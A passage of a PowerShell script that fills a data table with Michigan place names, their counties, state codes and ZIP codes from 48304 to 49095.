$Cities.Rows.Add("Bloomfield towns","Oakland","Michigan","MI","26","48304") + $null = $Cities.Rows.Add("Rochester hills","Oakland","Michigan","MI","26","48306") + $null = $Cities.Rows.Add("Rochester hills","Oakland","Michigan","MI","26","48307") + $null = $Cities.Rows.Add("Rochester hills","Oakland","Michigan","MI","26","48309") + $null = $Cities.Rows.Add("Sterling heights","Macomb","Michigan","MI","26","48310") + $null = $Cities.Rows.Add("Sterling heights","Macomb","Michigan","MI","26","48312") + $null = $Cities.Rows.Add("Sterling heights","Macomb","Michigan","MI","26","48313") + $null = $Cities.Rows.Add("Sterling heights","Macomb","Michigan","MI","26","48314") + $null = $Cities.Rows.Add("Shelby township","Macomb","Michigan","MI","26","48315") + $null = $Cities.Rows.Add("Shelby township","Macomb","Michigan","MI","26","48316") + $null = $Cities.Rows.Add("Shelby township","Macomb","Michigan","MI","26","48317") + $null = $Cities.Rows.Add("Sylvan lake","Oakland","Michigan","MI","26","48320") + $null = $Cities.Rows.Add("West bloomfield","Oakland","Michigan","MI","26","48322") + $null = $Cities.Rows.Add("Orchard lake","Oakland","Michigan","MI","26","48323") + $null = $Cities.Rows.Add("Orchard lake","Oakland","Michigan","MI","26","48324") + $null = $Cities.Rows.Add("Auburn hills","Oakland","Michigan","MI","26","48326") + $null = $Cities.Rows.Add("Waterford","Oakland","Michigan","MI","26","48327") + $null = $Cities.Rows.Add("Waterford","Oakland","Michigan","MI","26","48328") + $null = $Cities.Rows.Add("Waterford","Oakland","Michigan","MI","26","48329") + $null = $Cities.Rows.Add("Farmington hills","Oakland","Michigan","MI","26","48331") + $null = $Cities.Rows.Add("Farmington hills","Oakland","Michigan","MI","26","48334") + $null = $Cities.Rows.Add("Farmington hills","Oakland","Michigan","MI","26","48335") + $null = $Cities.Rows.Add("Farmington hills","Oakland","Michigan","MI","26","48336") + $null = $Cities.Rows.Add("Pontiac","Oakland","Michigan","MI","26","48340") + $null = $Cities.Rows.Add("Pontiac","Oakland","Michigan","MI","26","48341") + $null = $Cities.Rows.Add("Pontiac","Oakland","Michigan","MI","26","48342") + $null = $Cities.Rows.Add("Independence","Oakland","Michigan","MI","26","48346") + $null = $Cities.Rows.Add("Independence","Oakland","Michigan","MI","26","48348") + $null = $Cities.Rows.Add("Springfield","Oakland","Michigan","MI","26","48350") + $null = $Cities.Rows.Add("Hartland","Livingston","Michigan","MI","26","48353") + $null = $Cities.Rows.Add("Highland","Oakland","Michigan","MI","26","48356") + $null = $Cities.Rows.Add("Highland","Oakland","Michigan","MI","26","48357") + $null = $Cities.Rows.Add("Orion","Oakland","Michigan","MI","26","48359") + $null = $Cities.Rows.Add("Orion","Oakland","Michigan","MI","26","48360") + $null = $Cities.Rows.Add("Orion","Oakland","Michigan","MI","26","48362") + $null = $Cities.Rows.Add("Oakland","Oakland","Michigan","MI","26","48363") + $null = $Cities.Rows.Add("Addison township","Oakland","Michigan","MI","26","48367") + $null = $Cities.Rows.Add("Oxford","Oakland","Michigan","MI","26","48370") + $null = $Cities.Rows.Add("Oxford","Oakland","Michigan","MI","26","48371") + $null = $Cities.Rows.Add("Novi","Oakland","Michigan","MI","26","48374") + $null = $Cities.Rows.Add("Novi","Oakland","Michigan","MI","26","48375") + $null = $Cities.Rows.Add("Novi","Oakland","Michigan","MI","26","48377") + $null = $Cities.Rows.Add("Milford","Oakland","Michigan","MI","26","48380") + $null = $Cities.Rows.Add("Milford","Oakland","Michigan","MI","26","48381") + $null = $Cities.Rows.Add("Commerce townshi","Oakland","Michigan","MI","26","48382") + $null = $Cities.Rows.Add("White lake","Oakland","Michigan","MI","26","48383") + $null = $Cities.Rows.Add("White lake","Oakland","Michigan","MI","26","48386") + $null = $Cities.Rows.Add("Wolverine lake","Oakland","Michigan","MI","26","48390") + $null = $Cities.Rows.Add("Wixom","Oakland","Michigan","MI","26","48393") + $null = $Cities.Rows.Add("Zcta 483hh","Livingston","Michigan","MI","26","483HH") + $null = $Cities.Rows.Add("Applegate","Sanilac","Michigan","MI","26","48401") + $null = $Cities.Rows.Add("Attica","Lapeer","Michigan","MI","26","48412") + $null = $Cities.Rows.Add("Bad axe","Huron","Michigan","MI","26","48413") + $null = $Cities.Rows.Add("Bancroft","Shiawassee","Michigan","MI","26","48414") + $null = $Cities.Rows.Add("Birch run","Saginaw","Michigan","MI","26","48415") + $null = $Cities.Rows.Add("Brown city","Sanilac","Michigan","MI","26","48416") + $null = $Cities.Rows.Add("Burt","Saginaw","Michigan","MI","26","48417") + $null = $Cities.Rows.Add("Byron","Shiawassee","Michigan","MI","26","48418") + $null = $Cities.Rows.Add("Carsonville","Sanilac","Michigan","MI","26","48419") + $null = $Cities.Rows.Add("Clio","Genesee","Michigan","MI","26","48420") + $null = $Cities.Rows.Add("Columbiaville","Lapeer","Michigan","MI","26","48421") + $null = $Cities.Rows.Add("Croswell","Sanilac","Michigan","MI","26","48422") + $null = $Cities.Rows.Add("Davison","Genesee","Michigan","MI","26","48423") + $null = $Cities.Rows.Add("Decker","Sanilac","Michigan","MI","26","48426") + $null = $Cities.Rows.Add("Deckerville","Sanilac","Michigan","MI","26","48427") + $null = $Cities.Rows.Add("Dryden","Lapeer","Michigan","MI","26","48428") + $null = $Cities.Rows.Add("Durand","Shiawassee","Michigan","MI","26","48429") + $null = $Cities.Rows.Add("Fenton","Genesee","Michigan","MI","26","48430") + $null = $Cities.Rows.Add("Filion","Huron","Michigan","MI","26","48432") + $null = $Cities.Rows.Add("Flushing","Genesee","Michigan","MI","26","48433") + $null = $Cities.Rows.Add("Forestville","Sanilac","Michigan","MI","26","48434") + $null = $Cities.Rows.Add("Fostoria","Tuscola","Michigan","MI","26","48435") + $null = $Cities.Rows.Add("Gaines","Genesee","Michigan","MI","26","48436") + $null = $Cities.Rows.Add("Genesee","Genesee","Michigan","MI","26","48437") + $null = $Cities.Rows.Add("Goodrich","Genesee","Michigan","MI","26","48438") + $null = $Cities.Rows.Add("Grand blanc","Genesee","Michigan","MI","26","48439") + $null = $Cities.Rows.Add("Hadley","Lapeer","Michigan","MI","26","48440") + $null = $Cities.Rows.Add("Harbor beach","Huron","Michigan","MI","26","48441") + $null = $Cities.Rows.Add("Holly","Oakland","Michigan","MI","26","48442") + $null = $Cities.Rows.Add("Imlay city","Lapeer","Michigan","MI","26","48444") + $null = $Cities.Rows.Add("Kinde","Huron","Michigan","MI","26","48445") + $null = $Cities.Rows.Add("Lapeer","Lapeer","Michigan","MI","26","48446") + $null = $Cities.Rows.Add("Lennon","Genesee","Michigan","MI","26","48449") + $null = $Cities.Rows.Add("Lexington","Sanilac","Michigan","MI","26","48450") + $null = $Cities.Rows.Add("Linden","Genesee","Michigan","MI","26","48451") + $null = $Cities.Rows.Add("Marlette","Sanilac","Michigan","MI","26","48453") + $null = $Cities.Rows.Add("Melvin","Sanilac","Michigan","MI","26","48454") + $null = $Cities.Rows.Add("Metamora","Lapeer","Michigan","MI","26","48455") + $null = $Cities.Rows.Add("Minden city","Sanilac","Michigan","MI","26","48456") + $null = $Cities.Rows.Add("Montrose","Genesee","Michigan","MI","26","48457") + $null = $Cities.Rows.Add("Mount morris","Genesee","Michigan","MI","26","48458") + $null = $Cities.Rows.Add("New lothrop","Shiawassee","Michigan","MI","26","48460") + $null = $Cities.Rows.Add("North branch","Lapeer","Michigan","MI","26","48461") + $null = $Cities.Rows.Add("Ortonville","Oakland","Michigan","MI","26","48462") + $null = $Cities.Rows.Add("Otisville","Genesee","Michigan","MI","26","48463") + $null = $Cities.Rows.Add("Otter lake","Lapeer","Michigan","MI","26","48464") + $null = $Cities.Rows.Add("Palms","Sanilac","Michigan","MI","26","48465") + $null = $Cities.Rows.Add("Peck","Sanilac","Michigan","MI","26","48466") + $null = $Cities.Rows.Add("Port austin","Huron","Michigan","MI","26","48467") + $null = $Cities.Rows.Add("Port hope","Huron","Michigan","MI","26","48468") + $null = $Cities.Rows.Add("Port sanilac","Sanilac","Michigan","MI","26","48469") + $null = $Cities.Rows.Add("Ruth","Huron","Michigan","MI","26","48470") + $null = $Cities.Rows.Add("Sandusky","Sanilac","Michigan","MI","26","48471") + $null = $Cities.Rows.Add("Snover","Sanilac","Michigan","MI","26","48472") + $null = $Cities.Rows.Add("Swartz creek","Genesee","Michigan","MI","26","48473") + $null = $Cities.Rows.Add("Ubly","Huron","Michigan","MI","26","48475") + $null = $Cities.Rows.Add("Vernon","Shiawassee","Michigan","MI","26","48476") + $null = $Cities.Rows.Add("Zcta 484hh","Genesee","Michigan","MI","26","484HH") + $null = $Cities.Rows.Add("Flint","Genesee","Michigan","MI","26","48502") + $null = $Cities.Rows.Add("Flint","Genesee","Michigan","MI","26","48503") + $null = $Cities.Rows.Add("Northwest","Genesee","Michigan","MI","26","48504") + $null = $Cities.Rows.Add("Flint","Genesee","Michigan","MI","26","48505") + $null = $Cities.Rows.Add("Northeast","Genesee","Michigan","MI","26","48506") + $null = $Cities.Rows.Add("Flint","Genesee","Michigan","MI","26","48507") + $null = $Cities.Rows.Add("Northeast","Genesee","Michigan","MI","26","48509") + $null = $Cities.Rows.Add("Southeast","Genesee","Michigan","MI","26","48519") + $null = $Cities.Rows.Add("Southeast","Genesee","Michigan","MI","26","48529") + $null = $Cities.Rows.Add("Northwest","Genesee","Michigan","MI","26","48532") + $null = $Cities.Rows.Add("Zcta 485hh","Genesee","Michigan","MI","26","485HH") + $null = $Cities.Rows.Add("Saginaw","Saginaw","Michigan","MI","26","48601") + $null = $Cities.Rows.Add("Saginaw","Saginaw","Michigan","MI","26","48602") + $null = $Cities.Rows.Add("Saginaw","Saginaw","Michigan","MI","26","48603") + $null = $Cities.Rows.Add("Saginaw","Saginaw","Michigan","MI","26","48604") + $null = $Cities.Rows.Add("Saginaw","Saginaw","Michigan","MI","26","48607") + $null = $Cities.Rows.Add("Saginaw","Saginaw","Michigan","MI","26","48609") + $null = $Cities.Rows.Add("Alger","Ogemaw","Michigan","MI","26","48610") + $null = $Cities.Rows.Add("Auburn","Bay","Michigan","MI","26","48611") + $null = $Cities.Rows.Add("Beaverton","Gladwin","Michigan","MI","26","48612") + $null = $Cities.Rows.Add("Bentley","Bay","Michigan","MI","26","48613") + $null = $Cities.Rows.Add("Brant","Saginaw","Michigan","MI","26","48614") + $null = $Cities.Rows.Add("Breckenridge","Gratiot","Michigan","MI","26","48615") + $null = $Cities.Rows.Add("Chesaning","Saginaw","Michigan","MI","26","48616") + $null = $Cities.Rows.Add("Clare","Clare","Michigan","MI","26","48617") + $null = $Cities.Rows.Add("Coleman","Midland","Michigan","MI","26","48618") + $null = $Cities.Rows.Add("Comins","Oscoda","Michigan","MI","26","48619") + $null = $Cities.Rows.Add("Edenville","Midland","Michigan","MI","26","48620") + $null = $Cities.Rows.Add("Fairview","Oscoda","Michigan","MI","26","48621") + $null = $Cities.Rows.Add("Farwell","Clare","Michigan","MI","26","48622") + $null = $Cities.Rows.Add("Freeland","Saginaw","Michigan","MI","26","48623") + $null = $Cities.Rows.Add("Gladwin","Gladwin","Michigan","MI","26","48624") + $null = $Cities.Rows.Add("Harrison","Clare","Michigan","MI","26","48625") + $null = $Cities.Rows.Add("Hemlock","Saginaw","Michigan","MI","26","48626") + $null = $Cities.Rows.Add("Higgins lake","Roscommon","Michigan","MI","26","48627") + $null = $Cities.Rows.Add("Hope","Midland","Michigan","MI","26","48628") + $null = $Cities.Rows.Add("Houghton lake","Roscommon","Michigan","MI","26","48629") + $null = $Cities.Rows.Add("Houghton lake he","Roscommon","Michigan","MI","26","48630") + $null = $Cities.Rows.Add("Kawkawlin","Bay","Michigan","MI","26","48631") + $null = $Cities.Rows.Add("Lake","Clare","Michigan","MI","26","48632") + $null = $Cities.Rows.Add("Lake george","Clare","Michigan","MI","26","48633") + $null = $Cities.Rows.Add("Linwood","Bay","Michigan","MI","26","48634") + $null = $Cities.Rows.Add("Lupton","Ogemaw","Michigan","MI","26","48635") + $null = $Cities.Rows.Add("Luzerne","Oscoda","Michigan","MI","26","48636") + $null = $Cities.Rows.Add("Merrill","Saginaw","Michigan","MI","26","48637") + $null = $Cities.Rows.Add("Midland","Midland","Michigan","MI","26","48640") + $null = $Cities.Rows.Add("Midland","Midland","Michigan","MI","26","48642") + $null = $Cities.Rows.Add("Mio","Oscoda","Michigan","MI","26","48647") + $null = $Cities.Rows.Add("Oakley","Saginaw","Michigan","MI","26","48649") + $null = $Cities.Rows.Add("Pinconning","Bay","Michigan","MI","26","48650") + $null = $Cities.Rows.Add("Prudenville","Roscommon","Michigan","MI","26","48651") + $null = $Cities.Rows.Add("Rhodes","Gladwin","Michigan","MI","26","48652") + $null = $Cities.Rows.Add("Roscommon","Roscommon","Michigan","MI","26","48653") + $null = $Cities.Rows.Add("Rose city","Ogemaw","Michigan","MI","26","48654") + $null = $Cities.Rows.Add("Saint charles","Saginaw","Michigan","MI","26","48655") + $null = $Cities.Rows.Add("Saint helen","Roscommon","Michigan","MI","26","48656") + $null = $Cities.Rows.Add("Sanford","Midland","Michigan","MI","26","48657") + $null = $Cities.Rows.Add("Standish","Arenac","Michigan","MI","26","48658") + $null = $Cities.Rows.Add("Sterling","Arenac","Michigan","MI","26","48659") + $null = $Cities.Rows.Add("West branch","Ogemaw","Michigan","MI","26","48661") + $null = $Cities.Rows.Add("Wheeler","Gratiot","Michigan","MI","26","48662") + $null = $Cities.Rows.Add("Zcta 486hh","Arenac","Michigan","MI","26","486HH") + $null = $Cities.Rows.Add("Zcta 486xx","Gladwin","Michigan","MI","26","486XX") + $null = $Cities.Rows.Add("Akron","Tuscola","Michigan","MI","26","48701") + $null = $Cities.Rows.Add("Au gres","Arenac","Michigan","MI","26","48703") + $null = $Cities.Rows.Add("Barton city","Alcona","Michigan","MI","26","48705") + $null = $Cities.Rows.Add("University cente","Bay","Michigan","MI","26","48706") + $null = $Cities.Rows.Add("Bay city","Bay","Michigan","MI","26","48708") + $null = $Cities.Rows.Add("Bay port","Huron","Michigan","MI","26","48720") + $null = $Cities.Rows.Add("Black river","Alcona","Michigan","MI","26","48721") + $null = $Cities.Rows.Add("Bridgeport","Saginaw","Michigan","MI","26","48722") + $null = $Cities.Rows.Add("Caro","Tuscola","Michigan","MI","26","48723") + $null = $Cities.Rows.Add("Carrollton","Saginaw","Michigan","MI","26","48724") + $null = $Cities.Rows.Add("Caseville","Huron","Michigan","MI","26","48725") + $null = $Cities.Rows.Add("Cass city","Tuscola","Michigan","MI","26","48726") + $null = $Cities.Rows.Add("Clifford","Lapeer","Michigan","MI","26","48727") + $null = $Cities.Rows.Add("Curran","Alcona","Michigan","MI","26","48728") + $null = $Cities.Rows.Add("Deford","Tuscola","Michigan","MI","26","48729") + $null = $Cities.Rows.Add("East tawas","Iosco","Michigan","MI","26","48730") + $null = $Cities.Rows.Add("Elkton","Huron","Michigan","MI","26","48731") + $null = $Cities.Rows.Add("Essexville","Bay","Michigan","MI","26","48732") + $null = $Cities.Rows.Add("Fairgrove","Tuscola","Michigan","MI","26","48733") + $null = $Cities.Rows.Add("Frankenmuth","Saginaw","Michigan","MI","26","48734") + $null = $Cities.Rows.Add("Gagetown","Tuscola","Michigan","MI","26","48735") + $null = $Cities.Rows.Add("Glennie","Alcona","Michigan","MI","26","48737") + $null = $Cities.Rows.Add("Greenbush","Alcona","Michigan","MI","26","48738") + $null = $Cities.Rows.Add("Hale","Iosco","Michigan","MI","26","48739") + $null = $Cities.Rows.Add("Harrisville","Alcona","Michigan","MI","26","48740") + $null = $Cities.Rows.Add("Kingston","Tuscola","Michigan","MI","26","48741") + $null = $Cities.Rows.Add("Lincoln","Alcona","Michigan","MI","26","48742") + $null = $Cities.Rows.Add("Long lake","Iosco","Michigan","MI","26","48743") + $null = $Cities.Rows.Add("Mayville","Tuscola","Michigan","MI","26","48744") + $null = $Cities.Rows.Add("Mikado","Alcona","Michigan","MI","26","48745") + $null = $Cities.Rows.Add("Millington","Tuscola","Michigan","MI","26","48746") + $null = $Cities.Rows.Add("Munger","Bay","Michigan","MI","26","48747") + $null = $Cities.Rows.Add("National city","Iosco","Michigan","MI","26","48748") + $null = $Cities.Rows.Add("Omer","Arenac","Michigan","MI","26","48749") + $null = $Cities.Rows.Add("Oscoda","Iosco","Michigan","MI","26","48750") + $null = $Cities.Rows.Add("Owendale","Huron","Michigan","MI","26","48754") + $null = $Cities.Rows.Add("Pigeon","Huron","Michigan","MI","26","48755") + $null = $Cities.Rows.Add("Prescott","Ogemaw","Michigan","MI","26","48756") + $null = $Cities.Rows.Add("Reese","Tuscola","Michigan","MI","26","48757") + $null = $Cities.Rows.Add("Sebewaing","Huron","Michigan","MI","26","48759") + $null = $Cities.Rows.Add("Silverwood","Tuscola","Michigan","MI","26","48760") + $null = $Cities.Rows.Add("South branch","Iosco","Michigan","MI","26","48761") + $null = $Cities.Rows.Add("Spruce","Alcona","Michigan","MI","26","48762") + $null = $Cities.Rows.Add("Tawas city","Iosco","Michigan","MI","26","48763") + $null = $Cities.Rows.Add("Turner","Arenac","Michigan","MI","26","48765") + $null = $Cities.Rows.Add("Twining","Arenac","Michigan","MI","26","48766") + $null = $Cities.Rows.Add("Unionville","Tuscola","Michigan","MI","26","48767") + $null = $Cities.Rows.Add("Vassar","Tuscola","Michigan","MI","26","48768") + $null = $Cities.Rows.Add("Whittemore","Iosco","Michigan","MI","26","48770") + $null = $Cities.Rows.Add("Zcta 487hh","Alcona","Michigan","MI","26","487HH") + $null = $Cities.Rows.Add("Alma","Gratiot","Michigan","MI","26","48801") + $null = $Cities.Rows.Add("Ashley","Gratiot","Michigan","MI","26","48806") + $null = $Cities.Rows.Add("Bannister","Gratiot","Michigan","MI","26","48807") + $null = $Cities.Rows.Add("Bath","Clinton","Michigan","MI","26","48808") + $null = $Cities.Rows.Add("Belding","Ionia","Michigan","MI","26","48809") + $null = $Cities.Rows.Add("Carson city","Montcalm","Michigan","MI","26","48811") + $null = $Cities.Rows.Add("Charlotte","Eaton","Michigan","MI","26","48813") + $null = $Cities.Rows.Add("Clarksville","Ionia","Michigan","MI","26","48815") + $null = $Cities.Rows.Add("Corunna","Shiawassee","Michigan","MI","26","48817") + $null = $Cities.Rows.Add("Crystal","Montcalm","Michigan","MI","26","48818") + $null = $Cities.Rows.Add("Dansville","Ingham","Michigan","MI","26","48819") + $null = $Cities.Rows.Add("Dewitt","Clinton","Michigan","MI","26","48820") + $null = $Cities.Rows.Add("Dimondale","Eaton","Michigan","MI","26","48821") + $null = $Cities.Rows.Add("Eagle","Clinton","Michigan","MI","26","48822") + $null = $Cities.Rows.Add("East lansing","Ingham","Michigan","MI","26","48823") + $null = $Cities.Rows.Add("East lansing","Ingham","Michigan","MI","26","48824") + $null = $Cities.Rows.Add("Eaton rapids","Eaton","Michigan","MI","26","48827") + $null = $Cities.Rows.Add("Edmore","Montcalm","Michigan","MI","26","48829") + $null = $Cities.Rows.Add("Elm hall","Gratiot","Michigan","MI","26","48830") + $null = $Cities.Rows.Add("Carland","Clinton","Michigan","MI","26","48831") + $null = $Cities.Rows.Add("Elwell","Gratiot","Michigan","MI","26","48832") + $null = $Cities.Rows.Add("Fenwick","Montcalm","Michigan","MI","26","48834") + $null = $Cities.Rows.Add("Fowler","Clinton","Michigan","MI","26","48835") + $null = $Cities.Rows.Add("Fowlerville","Livingston","Michigan","MI","26","48836") + $null = $Cities.Rows.Add("Grand ledge","Eaton","Michigan","MI","26","48837") + $null = $Cities.Rows.Add("Greenville","Montcalm","Michigan","MI","26","48838") + $null = $Cities.Rows.Add("Haslett","Ingham","Michigan","MI","26","48840") + $null = $Cities.Rows.Add("Henderson","Shiawassee","Michigan","MI","26","48841") + $null = $Cities.Rows.Add("Holt","Ingham","Michigan","MI","26","48842") + $null = $Cities.Rows.Add("Howell","Livingston","Michigan","MI","26","48843") + $null = $Cities.Rows.Add("Hubbardston","Ionia","Michigan","MI","26","48845") + $null = $Cities.Rows.Add("Ionia","Ionia","Michigan","MI","26","48846") + $null = $Cities.Rows.Add("Ithaca","Gratiot","Michigan","MI","26","48847") + $null = $Cities.Rows.Add("Laingsburg","Shiawassee","Michigan","MI","26","48848") + $null = $Cities.Rows.Add("Lake odessa","Ionia","Michigan","MI","26","48849") + $null = $Cities.Rows.Add("Lakeview","Montcalm","Michigan","MI","26","48850") + $null = $Cities.Rows.Add("Lyons","Ionia","Michigan","MI","26","48851") + $null = $Cities.Rows.Add("Mcbrides","Montcalm","Michigan","MI","26","48852") + $null = $Cities.Rows.Add("Maple rapids","Clinton","Michigan","MI","26","48853") + $null = $Cities.Rows.Add("Mason","Ingham","Michigan","MI","26","48854") + $null = $Cities.Rows.Add("Middleton","Gratiot","Michigan","MI","26","48856") + $null = $Cities.Rows.Add("Morrice","Shiawassee","Michigan","MI","26","48857") + $null = $Cities.Rows.Add("Mount pleasant","Isabella","Michigan","MI","26","48858") + $null = $Cities.Rows.Add("Muir","Ionia","Michigan","MI","26","48860") + $null = $Cities.Rows.Add("Mulliken","Eaton","Michigan","MI","26","48861") + $null = $Cities.Rows.Add("Okemos","Ingham","Michigan","MI","26","48864") + $null = $Cities.Rows.Add("Orleans","Ionia","Michigan","MI","26","48865") + $null = $Cities.Rows.Add("Ovid","Clinton","Michigan","MI","26","48866") + $null = $Cities.Rows.Add("Owosso","Shiawassee","Michigan","MI","26","48867") + $null = $Cities.Rows.Add("Perrinton","Gratiot","Michigan","MI","26","48871") + $null = $Cities.Rows.Add("Perry","Shiawassee","Michigan","MI","26","48872") + $null = $Cities.Rows.Add("Pewamo","Ionia","Michigan","MI","26","48873") + $null = $Cities.Rows.Add("Pompeii","Gratiot","Michigan","MI","26","48874") + $null = $Cities.Rows.Add("Portland","Ionia","Michigan","MI","26","48875") + $null = $Cities.Rows.Add("Potterville","Eaton","Michigan","MI","26","48876") + $null = $Cities.Rows.Add("Riverdale","Gratiot","Michigan","MI","26","48877") + $null = $Cities.Rows.Add("Rosebush","Isabella","Michigan","MI","26","48878") + $null = $Cities.Rows.Add("Saint johns","Clinton","Michigan","MI","26","48879") + $null = $Cities.Rows.Add("Saint louis","Gratiot","Michigan","MI","26","48880") + $null = $Cities.Rows.Add("Saranac","Ionia","Michigan","MI","26","48881") + $null = $Cities.Rows.Add("Shepherd","Isabella","Michigan","MI","26","48883") + $null = $Cities.Rows.Add("Sheridan","Montcalm","Michigan","MI","26","48884") + $null = $Cities.Rows.Add("Sidney","Montcalm","Michigan","MI","26","48885") + $null = $Cities.Rows.Add("Six lakes","Montcalm","Michigan","MI","26","48886") + $null = $Cities.Rows.Add("Stanton","Montcalm","Michigan","MI","26","48888") + $null = $Cities.Rows.Add("Sumner","Gratiot","Michigan","MI","26","48889") + $null = $Cities.Rows.Add("Sunfield","Eaton","Michigan","MI","26","48890") + $null = $Cities.Rows.Add("Vestaburg","Montcalm","Michigan","MI","26","48891") + $null = $Cities.Rows.Add("Webberville","Ingham","Michigan","MI","26","48892") + $null = $Cities.Rows.Add("Weidman","Isabella","Michigan","MI","26","48893") + $null = $Cities.Rows.Add("Westphalia","Clinton","Michigan","MI","26","48894") + $null = $Cities.Rows.Add("Williamston","Ingham","Michigan","MI","26","48895") + $null = $Cities.Rows.Add("Winn","Isabella","Michigan","MI","26","48896") + $null = $Cities.Rows.Add("Woodland","Barry","Michigan","MI","26","48897") + $null = $Cities.Rows.Add("Zcta 488hh","Clinton","Michigan","MI","26","488HH") + $null = $Cities.Rows.Add("Lansing","Ingham","Michigan","MI","26","48906") + $null = $Cities.Rows.Add("Lansing","Ingham","Michigan","MI","26","48910") + $null = $Cities.Rows.Add("Lansing","Ingham","Michigan","MI","26","48911") + $null = $Cities.Rows.Add("Lansing","Ingham","Michigan","MI","26","48912") + $null = $Cities.Rows.Add("Lansing","Ingham","Michigan","MI","26","48915") + $null = $Cities.Rows.Add("Lansing","Eaton","Michigan","MI","26","48917") + $null = $Cities.Rows.Add("Lansing","Ingham","Michigan","MI","26","48933") + $null = $Cities.Rows.Add("Zcta 489hh","Eaton","Michigan","MI","26","489HH") + $null = $Cities.Rows.Add("Kalamazoo","Kalamazoo","Michigan","MI","26","49001") + $null = $Cities.Rows.Add("Kalamazoo","Kalamazoo","Michigan","MI","26","49002") + $null = $Cities.Rows.Add("Parchment","Kalamazoo","Michigan","MI","26","49004") + $null = $Cities.Rows.Add("Kalamazoo","Kalamazoo","Michigan","MI","26","49006") + $null = $Cities.Rows.Add("Kalamazoo","Kalamazoo","Michigan","MI","26","49007") + $null = $Cities.Rows.Add("Kalamazoo","Kalamazoo","Michigan","MI","26","49008") + $null = $Cities.Rows.Add("Kalamazoo","Kalamazoo","Michigan","MI","26","49009") + $null = $Cities.Rows.Add("Allegan","Allegan","Michigan","MI","26","49010") + $null = $Cities.Rows.Add("Athens","Calhoun","Michigan","MI","26","49011") + $null = $Cities.Rows.Add("Augusta","Kalamazoo","Michigan","MI","26","49012") + $null = $Cities.Rows.Add("Bangor","Van Buren","Michigan","MI","26","49013") + $null = $Cities.Rows.Add("Zcta 49014","Calhoun","Michigan","MI","26","49014") + $null = $Cities.Rows.Add("Battle creek","Calhoun","Michigan","MI","26","49015") + $null = $Cities.Rows.Add("Battle creek","Calhoun","Michigan","MI","26","49016") + $null = $Cities.Rows.Add("Battle creek","Calhoun","Michigan","MI","26","49017") + $null = $Cities.Rows.Add("Bellevue","Eaton","Michigan","MI","26","49021") + $null = $Cities.Rows.Add("Benton harbor","Berrien","Michigan","MI","26","49022") + $null = $Cities.Rows.Add("Zcta 49024","Kalamazoo","Michigan","MI","26","49024") + $null = $Cities.Rows.Add("Bloomingdale","Van Buren","Michigan","MI","26","49026") + $null = $Cities.Rows.Add("Breedsville","Van Buren","Michigan","MI","26","49027") + $null = $Cities.Rows.Add("Bronson","Branch","Michigan","MI","26","49028") + $null = $Cities.Rows.Add("Burlington","Calhoun","Michigan","MI","26","49029") + $null = $Cities.Rows.Add("Burr oak","St. Joseph","Michigan","MI","26","49030") + $null = $Cities.Rows.Add("Cassopolis","Cass","Michigan","MI","26","49031") + $null = $Cities.Rows.Add("Centreville","St. Joseph","Michigan","MI","26","49032") + $null = $Cities.Rows.Add("Ceresco","Calhoun","Michigan","MI","26","49033") + $null = $Cities.Rows.Add("Climax","Kalamazoo","Michigan","MI","26","49034") + $null = $Cities.Rows.Add("Coldwater","Branch","Michigan","MI","26","49036") + $null = $Cities.Rows.Add("Coloma","Berrien","Michigan","MI","26","49038") + $null = $Cities.Rows.Add("Colon","St. Joseph","Michigan","MI","26","49040") + $null = $Cities.Rows.Add("Constantine","St. Joseph","Michigan","MI","26","49042") + $null = $Cities.Rows.Add("Covert","Van Buren","Michigan","MI","26","49043") + $null = $Cities.Rows.Add("Decatur","Van Buren","Michigan","MI","26","49045") + $null = $Cities.Rows.Add("Delton","Barry","Michigan","MI","26","49046") + $null = $Cities.Rows.Add("Dowagiac","Cass","Michigan","MI","26","49047") + $null = $Cities.Rows.Add("Dowling","Barry","Michigan","MI","26","49050") + $null = $Cities.Rows.Add("East leroy","Calhoun","Michigan","MI","26","49051") + $null = $Cities.Rows.Add("Fulton","Kalamazoo","Michigan","MI","26","49052") + $null = $Cities.Rows.Add("Galesburg","Kalamazoo","Michigan","MI","26","49053") + $null = $Cities.Rows.Add("Gobles","Van Buren","Michigan","MI","26","49055") + $null = $Cities.Rows.Add("Grand junction","Van Buren","Michigan","MI","26","49056") + $null = $Cities.Rows.Add("Hartford","Van Buren","Michigan","MI","26","49057") + $null = $Cities.Rows.Add("Hastings","Barry","Michigan","MI","26","49058") + $null = $Cities.Rows.Add("Hickory corners","Barry","Michigan","MI","26","49060") + $null = $Cities.Rows.Add("Jones","Cass","Michigan","MI","26","49061") + $null = $Cities.Rows.Add("Lawrence","Van Buren","Michigan","MI","26","49064") + $null = $Cities.Rows.Add("Lawton","Van Buren","Michigan","MI","26","49065") + $null = $Cities.Rows.Add("Leonidas","St. Joseph","Michigan","MI","26","49066") + $null = $Cities.Rows.Add("Marcellus","Cass","Michigan","MI","26","49067") + $null = $Cities.Rows.Add("Marshall","Calhoun","Michigan","MI","26","49068") + $null = $Cities.Rows.Add("Martin","Allegan","Michigan","MI","26","49070") + $null = $Cities.Rows.Add("Mattawan","Van Buren","Michigan","MI","26","49071") + $null = $Cities.Rows.Add("Mendon","St. Joseph","Michigan","MI","26","49072") + $null = $Cities.Rows.Add("Nashville","Barry","Michigan","MI","26","49073") + $null = $Cities.Rows.Add("Nottawa","St. Joseph","Michigan","MI","26","49075") + $null = $Cities.Rows.Add("Olivet","Eaton","Michigan","MI","26","49076") + $null = $Cities.Rows.Add("Otsego","Allegan","Michigan","MI","26","49078") + $null = $Cities.Rows.Add("Paw paw","Van Buren","Michigan","MI","26","49079") + $null = $Cities.Rows.Add("Plainwell","Allegan","Michigan","MI","26","49080") + $null = $Cities.Rows.Add("Quincy","Branch","Michigan","MI","26","49082") + $null = $Cities.Rows.Add("Richland","Kalamazoo","Michigan","MI","26","49083") + $null = $Cities.Rows.Add("Saint joseph","Berrien","Michigan","MI","26","49085") + $null = $Cities.Rows.Add("Schoolcraft","Kalamazoo","Michigan","MI","26","49087") + $null = $Cities.Rows.Add("Scotts","Kalamazoo","Michigan","MI","26","49088") + $null = $Cities.Rows.Add("Sherwood","Branch","Michigan","MI","26","49089") + $null = $Cities.Rows.Add("South haven","Van Buren","Michigan","MI","26","49090") + $null = $Cities.Rows.Add("Sturgis","St. Joseph","Michigan","MI","26","49091") + $null = $Cities.Rows.Add("Tekonsha","Calhoun","Michigan","MI","26","49092") + $null = $Cities.Rows.Add("Three rivers","St. Joseph","Michigan","MI","26","49093") + $null = $Cities.Rows.Add("Union city","Branch","Michigan","MI","26","49094") + $null = $Cities.Rows.Add("Vandalia","Cass","Michigan","MI","26","49095") + $null = 